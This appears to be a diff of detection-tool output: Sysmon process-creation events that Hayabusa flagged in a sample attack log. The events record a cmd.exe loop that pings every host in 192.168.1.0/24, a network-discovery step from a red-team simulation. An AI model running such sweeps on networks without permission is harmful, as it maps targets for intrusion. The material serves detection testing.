+2019-07-19 23:53:11.504 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.194 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1104 | PGUID: 747F3D96-D957-5D31-0000-001072CF3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:12.040 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.195 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5244 | PGUID: 747F3D96-D958-5D31-0000-00105ED23600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:12.537 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.196 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4460 | PGUID: 747F3D96-D958-5D31-0000-001026DB3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:13.022 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.197 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3352 | PGUID: 747F3D96-D959-5D31-0000-001016DE3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:13.509 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.198 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1136 | PGUID: 747F3D96-D959-5D31-0000-001007E13600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:14.020 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.199 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 936 | PGUID: 747F3D96-D95A-5D31-0000-0010F7E33600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:14.513 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.200 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4480 | PGUID: 747F3D96-D95A-5D31-0000-0010EBE63600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:15.001 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.201 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6464 | PGUID: 747F3D96-D95A-5D31-0000-0010DBE93600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:15.518 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.202 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2392 | PGUID: 747F3D96-D95B-5D31-0000-0010CCEC3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:16.026 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.203 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2624 | PGUID: 747F3D96-D95C-5D31-0000-001039F03600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:16.521 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.204 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6804 | PGUID: 747F3D96-D95C-5D31-0000-0010F7F53600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:17.037 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.205 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 884 | PGUID: 747F3D96-D95D-5D31-0000-001001F93600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:17.438 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.206 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5828 | PGUID: 747F3D96-D95D-5D31-0000-0010C8013700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:18.043 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.207 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3436 | PGUID: 747F3D96-D95E-5D31-0000-0010B5043700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:18.544 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.208 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6296 | PGUID: 747F3D96-D95E-5D31-0000-0010A1073700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:19.012 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.209 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4660 | PGUID: 747F3D96-D95F-5D31-0000-0010930A3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:19.546 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.210 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6184 | PGUID: 747F3D96-D95F-5D31-0000-00107F0D3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:20.009 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.211 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3932 | PGUID: 747F3D96-D960-5D31-0000-00106B103700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:20.571 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.212 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 980 | PGUID: 747F3D96-D960-5D31-0000-001057133700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:21.020 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.213 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4944 | PGUID: 747F3D96-D961-5D31-0000-0010891F3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:21.520 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.214 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2892 | PGUID: 747F3D96-D961-5D31-0000-001075223700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:22.035 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.215 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7164 | PGUID: 747F3D96-D962-5D31-0000-001061253700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:22.520 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.216 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5124 | PGUID: 747F3D96-D962-5D31-0000-0010292E3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:23.011 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.217 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1996 | PGUID: 747F3D96-D963-5D31-0000-001016313700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:23.546 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.218 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2884 | PGUID: 747F3D96-D963-5D31-0000-001002343700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:23.993 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.219 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3896 | PGUID: 747F3D96-D963-5D31-0000-0010EF363700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:24.504 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.220 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6856 | PGUID: 747F3D96-D964-5D31-0000-0010DB393700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:25.008 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.221 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4932 | PGUID: 747F3D96-D965-5D31-0000-0010C73C3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:25.544 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.222 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1220 | PGUID: 747F3D96-D965-5D31-0000-0010B53F3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:26.004 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.223 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5792 | PGUID: 747F3D96-D965-5D31-0000-0010A1423700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:26.430 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.224 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5656 | PGUID: 747F3D96-D966-5D31-0000-00108D453700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:27.009 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.225 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6632 | PGUID: 747F3D96-D967-5D31-0000-00107C483700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:27.555 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.226 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5844 | PGUID: 747F3D96-D967-5D31-0000-0010BB513700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:28.035 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.227 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6396 | PGUID: 747F3D96-D968-5D31-0000-001001553700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:28.511 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.228 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1452 | PGUID: 747F3D96-D968-5D31-0000-0010F3573700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:29.009 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.229 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 112 | PGUID: 747F3D96-D969-5D31-0000-0010DF5A3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:29.534 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.230 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4004 | PGUID: 747F3D96-D969-5D31-0000-0010CB5D3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:30.034 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.231 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5468 | PGUID: 747F3D96-D96A-5D31-0000-0010B7603700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:30.521 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.232 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6600 | PGUID: 747F3D96-D96A-5D31-0000-0010A3633700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:31.013 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.233 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6220 | PGUID: 747F3D96-D96B-5D31-0000-001090663700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:31.530 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.234 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5016 | PGUID: 747F3D96-D96B-5D31-0000-00107C693700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:32.058 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.235 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 976 | PGUID: 747F3D96-D96C-5D31-0000-00106A6C3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:32.614 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.236 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5488 | PGUID: 747F3D96-D96C-5D31-0000-0010BA763700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:33.018 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.237 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3228 | PGUID: 747F3D96-D96D-5D31-0000-0010A7793700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:33.548 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.238 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2804 | PGUID: 747F3D96-D96D-5D31-0000-0010937C3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:34.005 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.239 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4532 | PGUID: 747F3D96-D96D-5D31-0000-0010827F3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
